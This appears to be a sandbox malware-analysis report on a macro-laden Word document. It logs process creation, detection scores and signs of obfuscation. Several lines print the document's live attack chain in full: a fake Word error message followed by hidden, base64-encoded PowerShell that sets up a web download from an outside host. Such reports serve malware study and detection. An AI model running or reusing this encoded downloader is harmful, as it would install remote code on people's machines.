Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B......{....................... .y.............................................................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B.............................. .y.............................................................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B.............................. .y.............................................................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B.............................. .y.............................................................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X ..............................}..v..... ......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v.....'......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X(..............................}..v.....(......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............R..j.... Fv.............................}..v....(.......0.{.....................t.......h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....................................}..v....`/......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............R..j.... Fv.............................}..v.....6......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j.....6..............................}..v....@7......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............R..j.... Fv.............................}..v.....<......0.{.....................r.......h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j....H=..............................}..v.....=......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G....... .......R..j.... Fv.............................}..v....XA......0.{..............Bv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j.....B..............................}..v.....B......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................29.j.....(..............................}..v.....['.....0.{.............8.v.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................29.j.....(..............................}..v....H.'.....0.{.............8.v.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: v22Pc0qA.doc.docMetadefender: Detection: 44%
Source: v22Pc0qA.doc.docReversingLabs: Detection: 86%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2113923637.00000000028B0000.00000002.00000001.sdmp
Source: v22Pc0qA.doc.docInitial sample: OLE summary subject = extensible Automotive generate withdrawal Wooden Global architecture

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
Source: v22Pc0qA.doc.docStream path 'Macros/VBA/Lxvinhyq0hu0i' : High number of GOTO operations
Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Lxvinhyq0hu0i
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWAD